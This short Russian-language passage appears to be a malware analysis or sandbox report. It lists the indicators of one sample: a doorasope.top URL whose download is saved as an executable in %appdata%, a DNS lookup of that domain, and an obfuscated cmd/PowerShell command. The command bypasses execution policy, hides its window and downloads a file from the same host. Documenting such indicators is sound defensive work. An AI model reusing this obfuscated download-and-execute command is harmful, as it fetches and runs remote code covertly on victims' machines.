Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^ERSH^elL.^EXE -EX^eCUtI^O^npo^L^icY B^YP^ass^ -NoPro^fiLe -wiNDo^WST^yL^e ^HIDD^eN (N^eW-o^B^J^E^ct^ s^YsTEM.nEt^.webCLIEnt)^.d^o^Wn^LoadfIl^e^('http://www.doorasope.top/read...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "POW^ERSH^elL.^EXE -EX^eCUtI^O^npo^L^icY B^YP^ass^ -NoPro^fiLe -wiNDo^WST^yL^e ^HIDD^eN (N^eW-o^B^J^E^ct^ s^YsTEM.nEt^.webCLIEnt)^.d^o^Wn^LoadfIl^e^('http://www.doorasope.top/read...' (со скрытым окном)